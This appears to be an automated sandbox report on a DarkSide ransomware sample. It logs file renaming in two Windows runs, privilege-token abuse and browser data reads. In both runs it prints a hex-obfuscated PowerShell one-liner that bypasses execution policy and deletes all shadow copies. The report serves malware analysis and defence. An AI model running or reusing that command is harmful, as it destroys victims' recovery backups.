Malware Analysis Report

2024-10-16 03:29

Sample ID 210726-ma8yez7gv2
Target 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample
SHA256 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
Tags: upx darkside ransomware spyware stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297

Threat Level: Known bad

The file 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample was found to be: Known bad.

Malicious Activity Summary

upx darkside ransomware spyware stealer

DarkSide

UPX packed file

Modifies extensions of user files

Reads user/profile data of web browsers

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-07-26 12:39

Signatures

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-07-26 12:39

Reported

2021-07-26 12:45

Platform

win7v20210408

Max time kernel

137s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\SelectLock.png => C:\Users\Admin\Pictures\SelectLock.png.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\SelectLock.png.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\UpdateDisable.tif => C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\EnterTest.tif => C:\Users\Admin\Pictures\EnterTest.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\EnterTest.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\ExpandSubmit.tif => C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 34 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/752-60-0x00000000750C1000-0x00000000750C3000-memory.dmp

memory/1832-61-0x0000000000000000-mapping.dmp

memory/1832-62-0x000007FEFB701000-0x000007FEFB703000-memory.dmp

memory/1832-63-0x00000000020A0000-0x00000000020A1000-memory.dmp

memory/1832-64-0x000000001AB40000-0x000000001AB41000-memory.dmp

memory/1832-65-0x00000000024B0000-0x00000000024B1000-memory.dmp

memory/1832-66-0x000000001AAC0000-0x000000001AAC2000-memory.dmp

memory/1832-67-0x000000001AAC4000-0x000000001AAC6000-memory.dmp

memory/1832-68-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/1832-69-0x000000001C480000-0x000000001C481000-memory.dmp

memory/1832-70-0x000000001C620000-0x000000001C621000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 1f8db64be6c37e59515420a11c6befba
SHA1 eb9e3cfd05f3d0552f7fe70dfd0e651721ec8a85
SHA256 699ee64cf0eb24f8666597759b5a0e7fb6cf727c4e6d109e1c26b1f6bcf477ea
SHA512 829bc83ff956f278c4846ec5e0c90a4715a245fa98dab6beeafebef8e56b3f3a2cac2a973215d984cb8a5f97226c8bd4ce5289bae2deb701883df5fbee363557

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c0dec4e1374490ca8e2ccac7538f4219
SHA1 b5ce5ff867d52f5d7533c167a01afad66d908d10
SHA256 acb51894e8438d8d0f61901edb4941ae33b1b7ae11e6f5356b4fde090adabd54
SHA512 6e748addcef4ae4ea3f9073775135c4be9bba8a5de60be89100ec5ce103ed5d2d67174b4e0acd1b1f31359eedae8df5240e1d79d4958be0e6d4f8e5cae5c46ca

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-26 12:39

Reported

2021-07-26 12:45

Platform

win10v20210408

Max time kernel

35s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

Signatures

DarkSide

ransomware darkside

Modifies extensions of user files

ransomware
Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\MergeUnregister.tiff => C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\BlockConvert.png => C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\CompleteDisconnect.tiff | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\CopyReset.raw => C:\Users\Admin\Pictures\CopyReset.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\JoinOut.tif => C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\MergeUnregister.tiff | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\RestartEdit.raw => C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\SplitRedo.png => C:\Users\Admin\Pictures\SplitRedo.png.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\BlockConvert.png.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\CompleteDisconnect.tiff => C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\ResolveRegister.tif => C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\RestartEdit.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\CompleteDisconnect.tiff.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\JoinOut.tif.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\MergeUnregister.tiff.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\ResolveRegister.tif.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File renamed | C:\Users\Admin\Pictures\StopEdit.raw => C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\StopEdit.raw.f001f8d5 | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 33 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 34 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: 36 | N/A | C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe

"C:\Users\Admin\AppData\Local\Temp\9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297.sample.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

N/A

Files

memory/3612-114-0x0000000000000000-mapping.dmp

memory/3612-119-0x00000164E4D90000-0x00000164E4D91000-memory.dmp

memory/3612-123-0x00000164FD450000-0x00000164FD451000-memory.dmp

memory/3612-132-0x00000164FD440000-0x00000164FD442000-memory.dmp

memory/3612-133-0x00000164FD443000-0x00000164FD445000-memory.dmp

memory/3612-134-0x00000164FD446000-0x00000164FD448000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ea6243fdb2bfcca2211884b0a21a0afc
SHA1 2eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA256 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 35041379cc75fcc9fb42ce3e4f901728
SHA1 12051d56c93158131177eb7a8220a1f2a26889bb
SHA256 68f2a1ab7e476374a20349a17c273a9a3a0941d0ac79a7a3823f0e9a8e208f69
SHA512 2d2a3969250afe48905e120f267267230190a566ee82cfcb4f3e3d17bee4d90497555f5a9484a40cfb032eb4f0cf412dbddc35339957a3afe23938520a2e52a5